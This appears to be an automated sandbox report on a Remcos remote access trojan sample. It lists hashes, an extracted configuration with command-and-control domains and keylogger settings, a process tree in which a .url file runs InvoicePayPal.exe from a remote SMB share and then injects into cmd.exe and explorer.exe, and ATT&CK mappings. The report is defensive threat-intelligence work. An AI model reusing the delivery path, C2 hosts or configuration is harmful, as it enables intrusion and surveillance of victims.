remcos | aa641dbc9ba61f0b29a8bbb5deda6e48d53a9af403f6fcff3d65ddc3b8d84156

General

Target

Order_Information.url
Size

201B
MD5

73461871b344c75f77323047fbafd617
SHA1

2a7860291499b27b133fe538f792173d7fc93de2
SHA256

dbd04333b7af300fbe8f6843866881403b48711d6380102109dabfdad6ad0251
SHA512

275bc9b94ebb8797c08a75bd4f0cebd7d8bf143d73d649df612fb4c2eeae9b6ea764f4871da9fa097f0b3e74d706e4c3e8b2e80ecaf94cdfefc6f0d9be8ea2cc

Score

10^/10

remcos remotehost rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

listpoints.online:6090

retghrtgwtrgtg.bounceme.net:3839

listpoints.click:7020

datastream.myvnc.com:5225

gservicese.com:2718

center.onthewifi.com:8118

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
explorer.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-BXAQVH
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

InvoicePayPal.exe

description pid process target process

PID 1564 created 376 1564 InvoicePayPal.exe rundll32.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

rundll32.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation rundll32.exe
Executes dropped EXE 1 IoCs

Processes:

WebCopier.exe

pid process

3316 WebCopier.exe
Loads dropped DLL 1 IoCs

Processes:

WebCopier.exe

pid process

3316 WebCopier.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

WebCopier.exe

description pid process target process

PID 3316 set thread context of 404 3316 WebCopier.exe cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

InvoicePayPal.exeWebCopier.execmd.exe

pid process

1564 InvoicePayPal.exe
1564 InvoicePayPal.exe
3316 WebCopier.exe
3316 WebCopier.exe
404 cmd.exe
404 cmd.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

WebCopier.execmd.exe

pid process

3316 WebCopier.exe
404 cmd.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

InvoicePayPal.exe

pid process

1564 InvoicePayPal.exe
1564 InvoicePayPal.exe

description	pid	process	target process
PID 1564 created 376	1564	InvoicePayPal.exe	rundll32.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation	rundll32.exe

pid	process
3316	WebCopier.exe

pid	process
3316	WebCopier.exe

description	pid	process	target process
PID 3316 set thread context of 404	3316	WebCopier.exe	cmd.exe

pid	process
1564	InvoicePayPal.exe
1564	InvoicePayPal.exe
3316	WebCopier.exe
3316	WebCopier.exe
404	cmd.exe
404	cmd.exe

pid	process
3316	WebCopier.exe
404	cmd.exe

pid	process
1564	InvoicePayPal.exe
1564	InvoicePayPal.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

rundll32.exeInvoicePayPal.exeWebCopier.execmd.exe

description	pid	process	target process
PID 376 wrote to memory of 1564	376	rundll32.exe	InvoicePayPal.exe
PID 376 wrote to memory of 1564	376	rundll32.exe	InvoicePayPal.exe
PID 376 wrote to memory of 1564	376	rundll32.exe	InvoicePayPal.exe
PID 1564 wrote to memory of 3316	1564	InvoicePayPal.exe	WebCopier.exe
PID 1564 wrote to memory of 3316	1564	InvoicePayPal.exe	WebCopier.exe
PID 1564 wrote to memory of 3316	1564	InvoicePayPal.exe	WebCopier.exe
PID 3316 wrote to memory of 404	3316	WebCopier.exe	cmd.exe
PID 3316 wrote to memory of 404	3316	WebCopier.exe	cmd.exe
PID 3316 wrote to memory of 404	3316	WebCopier.exe	cmd.exe
PID 3316 wrote to memory of 404	3316	WebCopier.exe	cmd.exe
PID 404 wrote to memory of 2248	404	cmd.exe	explorer.exe
PID 404 wrote to memory of 2248	404	cmd.exe	explorer.exe
PID 404 wrote to memory of 2248	404	cmd.exe	explorer.exe
PID 404 wrote to memory of 2248	404	cmd.exe	explorer.exe

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Order_Information.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:376

\??\UNC\62.173.141.114\scarica\InvoicePayPal.exe
"\\62.173.141.114\scarica\InvoicePayPal.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1564

C:\Users\Admin\AppData\Roaming\javahost_v5\WebCopier.exe
C:\Users\Admin\AppData\Roaming\javahost_v5\WebCopier.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:404

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
4⤵
PID:2248

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1d3e527a
Filesize
1.1MB

MD5
5f7b6e3acb1c144109ae7b2148a6b344

SHA1
2e14fc41a868bef4c59294ef6dfc01c8341bb269

SHA256
10cd679f0adcc3103979dcf7e036589fc174ca832cd5d8967b06b832c7aec671

SHA512
27615c81e9c8270d4701599004b0bcad57007a199db5d4e9ce41e5f4f92164e8c81c4c8ba412e9c2091a1c4bfd94664b9cf72a4e47cf95e98fdcd90af949efa7

Download Submit
C:\Users\Admin\AppData\Roaming\javahost_v5\WCUtil.dll
Filesize
180KB

MD5
fc081646850c1abf5d78706a6de6d639

SHA1
47bbf2399cb6cca6f129443fdd2b12265e3912ec

SHA256
05f89f7a7c06db98e3e2c89ca63d0d88f89bb4c18bcc5032ed63d1e2c1619fdb

SHA512
a79dbd417715fad354647aa667935b13e55130edfbce6a957682889a4142acd79abc835a7d1cd0f6671f83b47f007af54ee601d4431d6f64cfbef5b4363402fa

Download Submit
C:\Users\Admin\AppData\Roaming\javahost_v5\WCUtil.dll
Filesize
180KB

MD5
fc081646850c1abf5d78706a6de6d639

SHA1
47bbf2399cb6cca6f129443fdd2b12265e3912ec

SHA256
05f89f7a7c06db98e3e2c89ca63d0d88f89bb4c18bcc5032ed63d1e2c1619fdb

SHA512
a79dbd417715fad354647aa667935b13e55130edfbce6a957682889a4142acd79abc835a7d1cd0f6671f83b47f007af54ee601d4431d6f64cfbef5b4363402fa

Download Submit
C:\Users\Admin\AppData\Roaming\javahost_v5\WebCopier.exe
Filesize
7.2MB

MD5
e2a27870ba4da90df6276c4da9e3cf82

SHA1
cd0a17f6ddc7b4994d98f26848c3a2d7dae74e68

SHA256
9f1bb79ef7d76e5dddc628d0455c1f6a6aa068cc210f1d238a231f77ac9cbba2

SHA512
66c4d8d1c6cb45a6c10cbb16d4388858980e7bc4f57fb88dc2a3b7b8fc6da82dba3e9b1bfd33ea4c25a7afd5612c2823915e5f0759728cccfe81bd4f99afc235

Download Submit
C:\Users\Admin\AppData\Roaming\javahost_v5\WebCopier.exe
Filesize
7.2MB

MD5
e2a27870ba4da90df6276c4da9e3cf82

SHA1
cd0a17f6ddc7b4994d98f26848c3a2d7dae74e68

SHA256
9f1bb79ef7d76e5dddc628d0455c1f6a6aa068cc210f1d238a231f77ac9cbba2

SHA512
66c4d8d1c6cb45a6c10cbb16d4388858980e7bc4f57fb88dc2a3b7b8fc6da82dba3e9b1bfd33ea4c25a7afd5612c2823915e5f0759728cccfe81bd4f99afc235

Download Submit
C:\Users\Admin\AppData\Roaming\javahost_v5\paralanguage.xlsx
Filesize
925KB

MD5
4441c3a6efda6fe8a91638fab65b7592

SHA1
71fbdb1b42863a79acf37290d193053c67f8de9c

SHA256
798a990b2b9b7372072f2976884eebbf269aa30921643a87772d9d38fff1a39e

SHA512
ec7d675e0854abdf10a2df09d0425959da471fd382798152945f25fb31193fb3a4481bd2f26cea4de327c8e9d725152767eaef4d8fe1d23cde1fe0dc36de54cc

Download Submit
memory/404-24-0x00007FFF610B0000-0x00007FFF612A5000-memory.dmp

Filesize
2.0MB

Download
memory/404-26-0x0000000074640000-0x00000000747BB000-memory.dmp

Filesize
1.5MB

Download
memory/404-29-0x0000000074640000-0x00000000747BB000-memory.dmp

Filesize
1.5MB

Download
memory/404-27-0x0000000074640000-0x00000000747BB000-memory.dmp

Filesize
1.5MB

Download
memory/404-22-0x0000000074640000-0x00000000747BB000-memory.dmp

Filesize
1.5MB

Download
memory/1564-1-0x0000000074640000-0x00000000747BB000-memory.dmp

Filesize
1.5MB

Download
memory/1564-2-0x00007FFF610B0000-0x00007FFF612A5000-memory.dmp

Filesize
2.0MB

Download
memory/1564-0-0x0000000000400000-0x0000000000C1A000-memory.dmp

Filesize
8.1MB

Download
memory/1564-4-0x0000000074640000-0x00000000747BB000-memory.dmp

Filesize
1.5MB

Download
memory/1564-19-0x0000000074640000-0x00000000747BB000-memory.dmp

Filesize
1.5MB

Download
memory/1564-9-0x0000000074640000-0x00000000747BB000-memory.dmp

Filesize
1.5MB

Download
memory/2248-35-0x0000000000470000-0x00000000004F4000-memory.dmp

Filesize
528KB

Download
memory/2248-38-0x0000000000470000-0x00000000004F4000-memory.dmp

Filesize
528KB

Download
memory/2248-42-0x0000000000470000-0x00000000004F4000-memory.dmp

Filesize
528KB

Download
memory/2248-41-0x0000000000470000-0x00000000004F4000-memory.dmp

Filesize
528KB

Download
memory/2248-30-0x00007FFF610B0000-0x00007FFF612A5000-memory.dmp

Filesize
2.0MB

Download
memory/2248-31-0x0000000000470000-0x00000000004F4000-memory.dmp

Filesize
528KB

Download
memory/2248-34-0x0000000000BB0000-0x0000000000FE3000-memory.dmp

Filesize
4.2MB

Download
memory/2248-40-0x0000000000470000-0x00000000004F4000-memory.dmp

Filesize
528KB

Download
memory/2248-36-0x0000000000470000-0x00000000004F4000-memory.dmp

Filesize
528KB

Download
memory/2248-37-0x0000000000470000-0x00000000004F4000-memory.dmp

Filesize
528KB

Download
memory/2248-43-0x0000000000470000-0x00000000004F4000-memory.dmp

Filesize
528KB

Download
memory/2248-39-0x0000000000470000-0x00000000004F4000-memory.dmp

Filesize
528KB

Download
memory/3316-17-0x00007FFF610B0000-0x00007FFF612A5000-memory.dmp

Filesize
2.0MB

Download
memory/3316-18-0x0000000074640000-0x00000000747BB000-memory.dmp

Filesize
1.5MB

Download
memory/3316-20-0x0000000074640000-0x00000000747BB000-memory.dmp

Filesize
1.5MB

Download
memory/3316-16-0x0000000074640000-0x00000000747BB000-memory.dmp

Filesize
1.5MB

Download

Analysis

Sharing